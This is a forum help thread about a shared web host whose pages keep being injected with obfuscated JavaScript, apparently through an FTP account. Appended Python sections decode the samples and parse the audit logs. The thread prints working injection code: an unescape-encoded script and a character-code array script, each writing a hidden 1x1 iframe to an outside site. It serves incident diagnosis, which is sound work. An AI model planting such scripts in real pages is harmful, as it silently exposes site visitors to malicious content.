krisdigitx
asked on
proftpd sql injection cross site scripting
Recently on the webserver, I noticed a lot of pages being infected with this code:
<script type="text/javascript">
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%6F%75%6E%74%73%73%2E%63%6F%6D%2F%63%6F%75%6E%74%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
</script>
http://bugs.proftpd.org/show_bug.cgi?id=3115
I upgraded proftpd from 1.3.1 to 1.3.2, but the pages do get infected again. I ran audit on the webserver directory, which shows that the process is proftpd itself which alters the file, so the update did not fix the issue.
type=SYSCALL msg=audit(1235325508.686:71929): arch=40000003 syscall=5 success=yes exit=10 a0=814ad4c a1=8241 a2=1b6 a3=8241 items=1 ppid=25144 pid=5065 auid=4294967295 uid=0 gid=1012 euid=6537 suid=6537 fsuid=6537 egid=1012 sgid=1012 fsgid=1012 tty=(none) comm="proftpd" exe="/usr/local/sbin/proftpd" key=(null)
type=CWD msg=audit(1235325508.686:71929): cwd="/user/public_html"
type=PATH msg=audit(1235325508.686:71929): item=0 name="/user/public_html/index.html" inode=203182030 dev=08:07 mode=0100644 ouid=6537 ogid=1012 rdev=00:00
Following is the proftpd.conf, but it's copied from proftpd 1.3.1.
Anyone had a fix for this?
#
# usr/local/etc/proftpd/proftpd.conf -- This is a basic ProFTPD configuration file.
# To really apply changes reload proftpd after modifications.
#
Include /usr/local/etc/proftpd/modules.conf
ServerName "Reseller System FTP Server"
ServerType standalone
DeferWelcome on
MultilineRFC2228 on
DefaultServer on
ShowSymlinks on
TimeoutNoTransfer 600
TimeoutStalled 600
TimeoutIdle 1200
DisplayLogin welcome.msg
DisplayChdir .message
ListOptions "-l"
RequireValidShell off
DefaultRoot ~
IdentLookups off
DenyFilter \*.*/
SystemLog /var/log/proftpd.log
# Uncomment this if you are using NIS or LDAP to retrieve passwords:
#PersistentPasswd off
# Uncomment this if you would use TLS module:
#TLSEngine on
# Uncomment this if you would use quota module:
#Quotas on
# Uncomment this if you would use ratio module:
#Ratios on
# Port 21 is the standard FTP port.
DefaultAddress 0.0.0.0
Port 21
# To prevent DoS attacks, set the maximum number of child processes
# to 30. If you need to allow more than 30 concurrent connections
# at once, simply increase this value. Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd)
MaxInstances 30
# Set the user and group that the server normally runs at.
User nobody
Group nogroup
# Umask 022 is a good standard umask to prevent new files and dirs
# (second parm) from being group and world writable.
Umask 022 022
# Normally, we want files to be overwriteable.
AllowOverwrite on
# Allow CHOWN!
CapabilitiesEngine on
CapabilitiesSet +CAP_CHOWN
# Delay engine reduces impact of the so-called Timing Attack described in
# http://security.lss.hr/index.php?page=details&ID=LSS-2004-10-02
# It is on by default.
DelayEngine off
# SQL Authentication.
SQLAuthenticate users userset
SQLAuthTypes Crypt
SQLConnectInfo server proftpd passwd PERSESSION
SQLUserInfo web_users username crypt uid gid homedir NULL
SQLUserWhereClause "activated = 'Y'"
#SQLLogFile /var/log/proftpd-sql.log
# A basic anonymous configuration, no upload directories.
# <Anonymous ~ftp>
# User ftp
# Group nogroup
# # We want clients to be able to login with "anonymous" as well as "ftp"
# UserAlias anonymous ftp
# # Cosmetic changes, all files belongs to ftp user
# DirFakeUser on ftp
# DirFakeGroup on ftp
#
# RequireValidShell off
#
# # Limit the maximum number of anonymous logins
# MaxClients 10
#
# # We want 'welcome.msg' displayed at login, and '.message' displayed
# # in each newly chdired directory.
# DisplayLogin welcome.msg
# DisplayFirstChdir .message
#
# # Limit WRITE everywhere in the anonymous chroot
# <Directory *>
# <Limit WRITE>
# DenyAll
# </Limit>
# </Directory>
#
# # Uncomment this if you're brave.
# # <Directory incoming>
# # # Umask 022 is a good standard umask to prevent new files and dirs
# # # (second parm) from being group and world writable.
# # Umask 022 022
# # <Limit READ WRITE>
# # DenyAll
# # </Limit>
# # <Limit STOR>
# # AllowAll
# # </Limit>
# # </Directory>
#
# </Anonymous>
<VirtualHost xx.xx.xx.xx>
ServerName "EIN"
MaxClients 10
MaxLoginAttempts 1
DeferWelcome off
IdentLookups off
ShowSymlinks on
TimeoutNoTransfer 600
TimeoutStalled 600
TimeoutIdle 1200
DisplayLogin welcome.msg
DisplayChdir .message
ListOptions "-l"
RequireValidShell off
DefaultRoot ~
IdentLookups off
DenyFilter \*.*/
AllowOverwrite on
<Limit LOGIN>
AllowUser cranx
AllowUser alpha
AllowUser value
DenyAll
</Limit>
CapabilitiesEngine on
CapabilitiesSet +CAP_CHOWN
SQLAuthenticate users userset
SQLAuthTypes Crypt
SQLConnectInfo server proftpd passwd PERSESSION
SQLUserInfo users username crypt uid gid homedir NULL
SQLUserWhereClause "activated = 'Y'"
#SQLLogFile /var/log/proftpd-sql.log
</VirtualHost>
<VirtualHost xx.xx.xx.xx>
ServerName "Client"
MaxClients 20
MaxLoginAttempts 1
DeferWelcome off
IdentLookups off
ShowSymlinks on
TimeoutNoTransfer 600
TimeoutStalled 600
TimeoutIdle 1200
DisplayLogin welcome.msg
DisplayChdir .message
ListOptions "-l"
RequireValidShell off
DefaultRoot ~
IdentLookups off
DenyFilter \*.*/
AllowOverwrite on
<Limit LOGIN>
AllowUser user1
AllowUser user2
DenyAll
</Limit>
CapabilitiesEngine on
CapabilitiesSet +CAP_CHOWN
SQLAuthenticate users userset
SQLAuthTypes Crypt
SQLConnectInfo server proftpd passwd PERSESSION
SQLUserInfo web_users username crypt uid gid homedir NULL
SQLUserWhereClause "activated = 'Y'"
#SQLLogFile /var/log/proftpd-sql.log
</VirtualHost>
ASKER
It's running as 'nobody':
root 14980 21498 0 14:12 pts/0 00:00:00 grep proftp
nobody 20818 1 0 10:54 ? 00:00:00 proftpd: (accepting connections)
What has this to do with Apache?
Assuming that krisdigitx ensured that the files still contain this code (for example by inspecting the files on the server):
either the static files have been changed, or the content of the database from which the file content is generated has been modified.
Neither is an Apache problem; it is most likely a web application problem (unless the host itself has been compromised/hijacked).
ASKER
I didn't understand you earlier.
But many of the sites are infected with JavaScript code. Also, PHP on the server is PHP 4; I will try to update it to PHP 5, but I don't know if this is the problem. The log shows that the files were altered by proftpd. It also could be other virtualhosts accessing the file, but it is not so, since it is the same FTP user for the website which logs in at the time of modification.
ASKER
Checking the logs, I get these:
suhosin[16129]: ALERT - maximum execution depth reached - script terminated (attacker '121.247.75.237', file '/var/ares/webweavers/web/webweavers/www.domain.com/public_html/admin/editor/filemanager/browser/default/connectors/php/io.php', line 54)
apache: Unauthorised client: Attempted login as user from xx.xx.yy.yy (xx.xx.yy.yy)
Feb 14 09:38:28 tripolis suhosin[27849]: ALERT - tried to register forbidden variable '_REQUEST' through GET variables (attacker '69.73.154.225', file '/var/ares/domain/web/g0oker/www.domain.com/public_html/index.php')
Feb 14 09:38:28 tripolis suhosin[27849]: ALERT - tried to register forbidden variable '_REQUEST[option]' through GET variables (attacker '69.73.154.225', file '/var/ares/domain/web/g0oker/www.domain.com/public_html/index.php')
Feb 14 09:38:28 tripolis suhosin[27849]: ALERT - tried to register forbidden variable '_REQUEST[Itemid]' through GET variables (attacker '69.73.154.225', file '/var/ares/domain/web/g0oker/www.domain.com/public_html/index.php')
Feb 14 09:38:28 tripolis suhosin[27849]: ALERT - tried to register forbidden variable 'GLOBALS' through GET variables (attacker '69.73.154.225', file '/var/ares/domain/web/g0oker/www.domain.com/public_html/index.php')
ASKER
> .. many of the sites are infected
You mean the other virtual hosts on the same system?
Yes
> .. other virtualhosts accessing the file, but it is not so,
Does this mean that each virtual site has its own unique login user *and* that proftpd switches to that unique user before touching any file?
Yes
Silly question: did you check that the files are modified on your system?
If so, how did you do that?
I ran auditctl on the server, which shows what files have been changed and by whom.
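The auditd records quoted in the first post are the evidence this whole thread turns on, so here is how to read them mechanically. The Python below is an added example and not something posted in the thread: it groups the SYSCALL, CWD and PATH records of one audit event by their shared serial number, decodes the open(2) flags in a1, and reports which program wrote which file under which filesystem uid. The first event (serial 71929) is the one posted above, with the spaces extraction inserted into the serial and paths removed; the second event (serial 71930, an Apache worker denied with EACCES) is constructed here for contrast. A watch rule such as `auditctl -w /user/public_html -p wa -k webroot` produces records like these; the thread does not show the exact rule that was used, so that is an assumption. The flag decoding assumes the i386 values, matching arch=40000003 and syscall=5 (open) in the record.

```python
"""Correlate Linux audit records by serial and report who wrote which file, as what uid.

The first event (serial 71929) is the one posted in this thread; the second
(serial 71930) is constructed here for contrast. The parsing, open(2) flag
decoding and report are an added example, not something from the thread.
"""
import re
from collections import defaultdict

AUDIT_LOG = """\
type=SYSCALL msg=audit(1235325508.686:71929): arch=40000003 syscall=5 success=yes exit=10 a0=814ad4c a1=8241 a2=1b6 a3=8241 items=1 ppid=25144 pid=5065 auid=4294967295 uid=0 gid=1012 euid=6537 suid=6537 fsuid=6537 egid=1012 sgid=1012 fsgid=1012 tty=(none) comm="proftpd" exe="/usr/local/sbin/proftpd" key=(null)
type=CWD msg=audit(1235325508.686:71929): cwd="/user/public_html"
type=PATH msg=audit(1235325508.686:71929): item=0 name="/user/public_html/index.html" inode=203182030 dev=08:07 mode=0100644 ouid=6537 ogid=1012 rdev=00:00
type=SYSCALL msg=audit(1235325601.120:71930): arch=40000003 syscall=5 success=no exit=-13 a0=9a2f0c8 a1=8241 a2=1b6 a3=8241 items=1 ppid=2000 pid=2011 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) comm="apache2" exe="/usr/sbin/apache2" key=(null)
type=CWD msg=audit(1235325601.120:71930): cwd="/"
type=PATH msg=audit(1235325601.120:71930): item=0 name="/user/public_html/index.html" inode=203182030 dev=08:07 mode=0100644 ouid=6537 ogid=1012 rdev=00:00
"""

RECORD_RE = re.compile(r"^type=(?P<type>\w+) msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\): (?P<body>.*)$")
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\([^)]*\)|\S+)')
AUDIT_ARCH_I386 = "40000003"   # arch value auditd logs for 32-bit x86
SYS_OPEN_I386 = "5"            # open(2) on i386
# open(2) flag bits on x86 (O_LARGEFILE is 0x8000 there)
OPEN_FLAGS = {0x1: "O_WRONLY", 0x2: "O_RDWR", 0x40: "O_CREAT", 0x200: "O_TRUNC",
              0x400: "O_APPEND", 0x8000: "O_LARGEFILE"}
UNSET_AUID = 4294967295  # (unsigned)-1: no login session, i.e. a daemon started at boot


def parse_audit(text):
    """Group records by serial; a SYSCALL and its CWD/PATH records share one serial."""
    events = defaultdict(lambda: {"paths": []})
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue
        fields = {k: v.strip('"') for k, v in FIELD_RE.findall(m["body"])}
        ev = events[m["serial"]]
        ev["ts"] = float(m["ts"])
        if m["type"] == "PATH":
            ev["paths"].append(fields)
        else:
            ev[m["type"]] = fields
    return dict(events)


def decode_open_flags(a1_hex):
    """Turn the hex a1 argument of open(2) into flag names (x86 values)."""
    bits = int(a1_hex, 16)
    return [name for bit, name in sorted(OPEN_FLAGS.items()) if bits & bit]


def summarize(events):
    """One row per touched path: who did it, as which uid, and whether that uid owns the file."""
    rows = []
    for serial in sorted(events, key=int):
        ev = events[serial]
        sc = ev.get("SYSCALL", {})
        is_open = sc.get("arch") == AUDIT_ARCH_I386 and sc.get("syscall") == SYS_OPEN_I386
        for p in ev["paths"]:
            rows.append({
                "serial": serial,
                "comm": sc.get("comm"),
                "exe": sc.get("exe"),
                "pid": sc.get("pid"),
                "success": sc.get("success") == "yes",
                "fsuid": sc.get("fsuid"),
                "ouid": p.get("ouid"),
                # fsuid is the uid the kernel used for the permission check on this file
                "wrote_as_owner": sc.get("fsuid") == p.get("ouid"),
                "daemon": sc.get("auid") == str(UNSET_AUID),
                "flags": decode_open_flags(sc["a1"]) if is_open and "a1" in sc else [],
                "path": p.get("name"),
            })
    return rows


if __name__ == "__main__":
    for r in summarize(parse_audit(AUDIT_LOG)):
        verdict = "ok" if r["success"] else "denied"
        print(f"{r['serial']} {r['comm']}[{r['pid']}] fsuid={r['fsuid']} owner={r['ouid']} "
              f"{'|'.join(r['flags'])} {r['path']} {verdict}")
```

For the posted event the report shows fsuid=6537 equal to the file's ouid=6537, auid unset, and flags O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE with mode 0666: a proftpd child, running as the FTP account that owns the file, truncated and rewrote index.html. That is what an authenticated upload looks like (proftpd switches to the login user before touching files, as confirmed above), so the record points at that account's session rather than at proftpd itself.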
ASKER
OK, I managed to get the scripts which were executing. Do you think it must have affected other virtualhosts/websites too?
* EDIT by modus_in_rebus * Masked out exploit links
root@tripolis:/usr/src/hacked# cat index.php
<script>a=new Array(59.76,104.61,101.82,113.66,96.97,108.8,100.76,31.66,114.66,113.65,98.78,60.8,33.69,103.6,115.99,115.63,111.96,57.6,46.9,46.88,99.89,97.74,50.71,50.9,102.73,52.94,51.9,99.72,54.62,54.69,105.93,45.79,98.7,109.76,46.86,98.68,102.97,104.62,44.74,97.64,104.67,109.93,46.84,104.76,109.93,99.83,100.79,119.9,45.84,98.7,102.78,104.73,62.85,114.9,103.63,101.99,101.85,33.94,31.71,118.88,104.63,99.65,115.68,103.74,60.82,48.94,31.82,103.79,100.96,104.97,102.83,103.64,115.91,60.68,48.81,31.84,114.91,115.6,120.75,107.75,100.71,60.93,33.89,117.97,104.84,114.93,104.96,97.69,104.87,107.68,104.98,115.91,120.74,57.66,31.66,103.96,104.6,99.89,99.76,100.96,109.86,33.6,61.61,59.77,46.68,104.82,101.62,113.6,96.83,108.77,100.76,61.94);var i;
for (i=0;i<=a.length; i++){document.write(String.fromCharCode(Math.round(a[i])));};</script>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<html><body><p align=right><a href=***MASKED*EXPLOIT*LINK*2***><font face=Arial size=3 color=#000080>??????? ?????</font></a><font face="Arial" size="3" color="#000080">
| </font><font face=Arial size=3 color=#F0EEEC><a href=***MASKED*EXPLOIT*LINK*2***>?????</a></font></p><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<p align=right><a href=***MASKED*EXPLOIT*LINK*2***><font face=Arial size=3 color=#F0EEEC>ýýýýýýý ýýýýý</font></a></p>
<p align=right><font face=Arial size=3 color=#F0EEEC><a href=***MASKED*EXPLOIT*LINK*2***>ýýýýý</a></font></p>
<p align=right> </p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>ýýýýý
ýýýýý</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>ýýý
ýýýýýý</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>ýýýýýýý</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>video</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>ýýýýýýýýýýý</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>ýýýýýýý</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 color=#CECECE>ýýýýýýý</font></a></p>
</body></body></html>
root@tripolis:/usr/src/hacked#
This is just another script located on your server, but it does no damage on the server when called.
If you can ensure that the user running the proftpd process modifies the files, you need to update all proftpd instances on the host.
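Two obfuscation styles appear in this thread: the `document.write(unescape('%3C...'))` payload quoted in the first post, and the `String.fromCharCode(Math.round(a[i]))` array in the recovered index.php. Both hide what gets written into the page. The Python below is an added example, not code from the thread: it decodes both payload strings exactly as copied from the page (the stray spaces extraction put into the hex string are stripped by the decoder, which is also what the constructed `"% 3C%\n69"` test input exercises) and pulls the iframe `src` out of the result. The `js_round` helper and the `iframe_sources` regex are mine; the decoder reproduces JavaScript semantics where Python differs (`Math.round` rounds halves up while Python's `round` rounds half to even, and `unescape` treats each %XX as one Latin-1 code unit rather than UTF-8).

```python
"""Decode the two obfuscated <script> payloads that appear in this thread.

Both payload strings are copied from the page (extraction spaces removed).
The decoding functions and the iframe-extraction helper are added here and
are not part of the thread.
"""
import math
import re
from urllib.parse import unquote

# Payload 1 (first post): document.write(unescape('...'))
UNESCAPE_PAYLOAD = (
    "%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%6F%75%6E"
    "%74%73%73%2E%63%6F%6D%2F%63%6F%75%6E%74%2F%69%6E%2E%70%68%70%22%20%77%69"
    "%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69"
    "%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%22%3E%3C%2F%69%66%72%61"
    "%6D%65%3E"
)

# Payload 2 (recovered index.php): Math.round() over a float array, then fromCharCode
FROMCHARCODE_SCRIPT = (
    "<script>a=new Array(59.76,104.61,101.82,113.66,96.97,108.8,100.76,31.66,114.66,"
    "113.65,98.78,60.8,33.69,103.6,115.99,115.63,111.96,57.6,46.9,46.88,99.89,97.74,"
    "50.71,50.9,102.73,52.94,51.9,99.72,54.62,54.69,105.93,45.79,98.7,109.76,46.86,"
    "98.68,102.97,104.62,44.74,97.64,104.67,109.93,46.84,104.76,109.93,99.83,100.79,"
    "119.9,45.84,98.7,102.78,104.73,62.85,114.9,103.63,101.99,101.85,33.94,31.71,"
    "118.88,104.63,99.65,115.68,103.74,60.82,48.94,31.82,103.79,100.96,104.97,102.83,"
    "103.64,115.91,60.68,48.81,31.84,114.91,115.6,120.75,107.75,100.71,60.93,33.89,"
    "117.97,104.84,114.93,104.96,97.69,104.87,107.68,104.98,115.91,120.74,57.66,31.66,"
    "103.96,104.6,99.89,99.76,100.96,109.86,33.6,61.61,59.77,46.68,104.82,101.62,"
    "113.6,96.83,108.77,100.76,61.94);var i;\n"
    "for (i=0;i<=a.length; i++){document.write(String.fromCharCode(Math.round(a[i])));};"
    "</script>"
)


def js_round(x):
    """JavaScript Math.round: round half toward +infinity (Python's round() is half-to-even)."""
    return math.floor(x + 0.5)


def decode_unescape(payload):
    """Decode a JS unescape() argument.

    Whitespace picked up when the payload was copied is dropped first. unescape()
    also accepts %uXXXX (not understood by urllib), and treats %XX as one Latin-1
    code unit rather than as UTF-8, so decode with latin-1.
    """
    compact = re.sub(r"\s+", "", payload)
    compact = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), compact)
    return unquote(compact, encoding="latin-1")


def decode_fromcharcode(script):
    """Recover the string a fromCharCode(Math.round(a[i])) loop writes.

    The loop on the page runs to i<=a.length, so the last iteration reads
    a[a.length] (undefined); Math.round(undefined) is NaN and fromCharCode(NaN)
    is "\\u0000". Browsers ignore that trailing NUL, and so does this decoder.
    """
    m = re.search(r"new Array\(([^)]*)\)", script)
    if not m:
        raise ValueError("no Array(...) literal found")
    codes = [js_round(float(v)) for v in m.group(1).split(",") if v.strip()]
    return "".join(chr(c) for c in codes)


IFRAME_SRC_RE = re.compile(r"<iframe\b[^>]*\bsrc=[\"']?([^\"'\s>]+)", re.IGNORECASE)


def iframe_sources(html):
    """Pull iframe src URLs out of decoded markup: the indicators to block and grep for."""
    return IFRAME_SRC_RE.findall(html)


if __name__ == "__main__":
    for name, decoded in (("unescape", decode_unescape(UNESCAPE_PAYLOAD)),
                          ("fromCharCode", decode_fromcharcode(FROMCHARCODE_SCRIPT))):
        print(f"{name}: {decoded}")
        print("  iframe src:", iframe_sources(decoded))
```

Both payloads decode to the same shape, a 1x1 iframe with `visibility: hidden`, differing only in the URL. The decoded `src` values are the strings to search for across every docroot on the host (the encoded forms vary per file, the decoded iframe does not), and `iframe_sources` is the piece to run over whatever other obfuscated blocks turn up.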